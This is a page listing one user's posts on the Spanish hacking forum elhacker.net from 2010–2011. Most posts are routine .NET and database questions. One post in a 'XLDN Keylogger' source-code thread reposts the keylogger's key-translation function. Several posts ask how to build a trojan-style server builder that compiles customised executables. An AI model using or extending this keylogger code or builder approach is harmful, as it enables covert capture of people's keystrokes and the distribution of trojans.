elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1] 2 3
1  Programación / Programación General / Re: Pasar datos de excel a acces? en: 14 Abril 2011, 00:28 am
Sabes .NET? Hay varias funciones para leer Excel, luego podrías insertar en la bbdd lo qué te interese.
2  Programación / Programación General / Hacer multiplataforma en .NET en: 8 Abril 2011, 20:02 pm
Hola de nuevo gente, estoy haciendo una aplicación en .NET que he empezado a desarrollar en Visual Studio 2010.

Durante el desarrollo, mi PC se volvió loco y no hubo mas remedio que formatear, me instalé ubuntu y desarrollo en una virtual.

He leido que se puede desarrollar aplicaciones de vb.NET winforms con el entorno de desarrollo MONO, ahora bien mis preguntas son:

¿Puedo convertir mi proyecto de Visual Studio 2010 a Mono?

¿Qué versión de Mono instalo? Me instalé el entorno pero no consigo acceder a la creación/visualización de formularios

¿Aun haciendo mi aplicación en Visual Studio 2010 (compilando en Netframework 2) podría ejecutarla con normalidad en mi ubuntu?

Gracias, un saludo
3  Programación / Programación General / Re: ¿Me ayudan a decidirme? C / C++ o Java o .NET? en: 8 Abril 2011, 15:32 pm
+1000 a empezar con C. En la uni empezamos con java y (a parte de no se explicaba nada) hubo un monton de complicaciones. Odie la programación. Un año después volví a estudiar programación empezando con C, y como bien han dicho antes, cuando dominas punteros te crees dios.

Una vez llegues a ese punto, pasar de un lenguaje a otro será decir lo mismo cambiando unas pocas palabras.

Suerte
4  Programación / Programación General / Re: Base de datos para distribuir gratis en: 8 Abril 2011, 08:08 am
Ok, muchas gracias por las respuestas. Ésta misma tarde cambiaré las conexiones.

Seréis los primeros en poder descargarla, sí os gustan las series creo que vais a disfrutar de mi programa. Me creare otro perfil para ello.

Saludos
5  Programación / Programación General / Base de datos para distribuir gratis en: 7 Abril 2011, 23:23 pm
Muy buenas gente, ya ha pasado tiempo desde la última vez que anduve por aquí.. y es que me ha surgido una duda que no consigo solucionar.

He programado una aplicación que quiero distribuir de forma gratuita, y no se que motor de BBDD utilizar.

El problema es que no quiero pagar ni un €, pero tampoco quiero distribuir nada "ilegal". Quiero que mi base de datos tenga una licencia que me permita distribuir la aplicación con su base de datos, y sus consultas, conexiones... etc.

Estoy decidiéndome por usar Sqlite, también he pensado en MySql y alguna otra que he visto, pero el problema es el siguiente: no quiero distribuir mi código.

¿Es legal que distribuya una aplicación que realice consultas, actualizaciones de BBDD.. etc con Sqlite sin hacer libre mi código?


Espero haberme explicado con claridad...

Un saludo gente, y gracias de antemano.
6  Programación / .NET (C#, VB.NET, ASP) / Re: Compilar desde code. en: 8 Marzo 2010, 16:25 pm
Gracias por los aportes, estoy consultandolos, el tema es que se me olvido decir, el lenguaje en el que desarrollo es VB.net.. grcias de todos modos
7  Programación / .NET (C#, VB.NET, ASP) / Re: Compilar desde code. en: 6 Marzo 2010, 14:19 pm
Me explico de forma rapida:  Un boton en un formulario del programa 1 me compila un codigo y me crea un segundo exe.
Compilar codigo he coseguido, pero no me sirve crear un simple module. Necesito saber como crear un formulario por codigo.

Alguna idea?

Supongo que quieres hacer algo como los editores de server (tipo troyanos) que al pulsar un boton pueda crear otro ejecutable con las instrucciones o variables que necesites, si es asi un modo podría ser que el *.exe lo tenga como recurso y cuando oprima el boton lo extraiga en el disco duro y al llegar al valor que contiene una o mas variables ir cambiando las mismas por las que necesitamos y se crea un nuevo archivo *.exe personalizado, es una forma pero de seguro hay muchas más.


Quiero exactamente lo que has descrito. Al estilo trojan-server, que el cliente pueda modificar una variable del servidor(ejemplo: puerto de escucha) y tras pulsar un boton, compilar el codigo del servidor(guardado previamente en el codigo del cliente) con algunos valores cambiados.

Necesito que la aplicacion creada sea un form, con sus correspondientes elementos(Unicamente un textbox), por lo que he llegado a suponer que necesito compilar un codigo que contenga tambien el diseño del formulario como codigo..

Sigo checkeando..
8  Programación / .NET (C#, VB.NET, ASP) / Re: Compilar desde code. en: 5 Marzo 2010, 13:57 pm
Lo siento, no entendi mmuy bien xD que quieres decir con "compila otro tipo al ensamblado" ?

Saludos
9  Programación / .NET (C#, VB.NET, ASP) / Compilar desde code. en: 5 Marzo 2010, 13:42 pm
Me explico de forma rapida:  Un boton en un formulario del programa 1 me compila un codigo y me crea un segundo exe.
Compilar codigo he coseguido, pero no me sirve crear un simple module. Necesito saber como crear un formulario por codigo.

Alguna idea?
10  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 5 Marzo 2010, 13:38 pm
Vale, cosa muy extraña, el copy paste se comio unos caracteres xD!

vuelvo a dejar la funcion:

Código:
    Private Function TranslateKey(ByVal KeyCode As Long) As String
        Dim LngShift As Long

        'Funcion optimizada para su uso en teclados españoles.

        LngShift = GetAsyncKeyState(ShiftKey)
        If KeyCode > 64 And KeyCode < 91 Then
            TranslateKey = IIf(LngShift <> 0, Chr(KeyCode), Chr(KeyCode + 32))
        ElseIf KeyCode >= 58 And KeyCode <= 90 Then
            TranslateKey = If(LngShift <> 0, Chr(KeyCode), UCase(Chr(KeyCode)))
        ElseIf KeyCode >= 96 And KeyCode <= 105 Then
            TranslateKey = Chr(KeyCode - 48)
        ElseIf KeyCode >= 112 And KeyCode <= 123 Then
            TranslateKey = "{F" & KeyCode - 111 & "}"
        Else

            If KeyCode = 1 Then TranslateKey = ""
            If KeyCode = 2 Then TranslateKey = ""
            If KeyCode = 4 Then TranslateKey = ""
            If KeyCode = 160 Then TranslateKey = ""
            If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}"
            If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}"
            If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}"
            If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}"
            If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}"
            If KeyCode = 32 Then TranslateKey = " "
            If KeyCode = 27 Then TranslateKey = "{ESC}"
            If KeyCode = 46 Then TranslateKey = "{DEL}"
            If KeyCode = 36 Then TranslateKey = "{HOME}"
            If KeyCode = 35 Then TranslateKey = "{END}"
            If KeyCode = 33 Then TranslateKey = "{PAGE UP}"
            If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}"
            If KeyCode = 45 Then TranslateKey = "{PASTE}"
            If KeyCode = 144 Then TranslateKey = "{NUM}"
            If KeyCode = 111 Then TranslateKey = "{NUMPAD / }"
            If KeyCode = 106 Then TranslateKey = "{NUMPAD * }"
            If KeyCode = 109 Then TranslateKey = "{NUMPAD - }"
            If KeyCode = 107 Then TranslateKey = "{NUMPAD + }"
            If KeyCode = 13 Then TranslateKey = "{ENTER}"
            If KeyCode = 8 Then TranslateKey = "{BACK}"
            If KeyCode = 221 Then TranslateKey = "{ACCENTO}"
            If KeyCode = 9 Then TranslateKey = "{TAB}"
            If KeyCode = 20 Then TranslateKey = "{BLOQ. MAYUS}"
            If KeyCode = 162 Then TranslateKey = "{CNTRL LEFT}"
            If KeyCode = 163 Then TranslateKey = "{CNTRL DER.}"
            If KeyCode = 91 Then TranslateKey = "{WINDOWS}"
            If KeyCode = 164 Then TranslateKey = "{ALT}"
            If KeyCode = 165 Then TranslateKey = "{ALTGR}"
            If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}"
            If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",")
            If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".")
            If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-")

            If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+")

            If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "'")
            If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "º", "ª")
            If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0")
            If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1")
            If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2")
            If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "·", "3")
            If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4")
            If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5")
            If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6")
            If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7")
            If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8")
            If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9")
            If KeyCode = 145 Then TranslateKey = "{ROLL}"
            If KeyCode = 44 Then TranslateKey = "{PRINT}"
            If KeyCode = 19 Then TranslateKey = "{PAUSE}"
            If KeyCode = 16 Then TranslateKey = "{SHIFT}"

        End If
    End Function

Con lo otro me referia a(explicandolo de forma rapida) dar a un boton en un formulario que me compile el codigo que yo meta en un textbox (Un simple hello world). Esto lo he conseguido, pero lo que necesito es poder compilar un programa con formularios; Crear un formulario desde codigo...
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines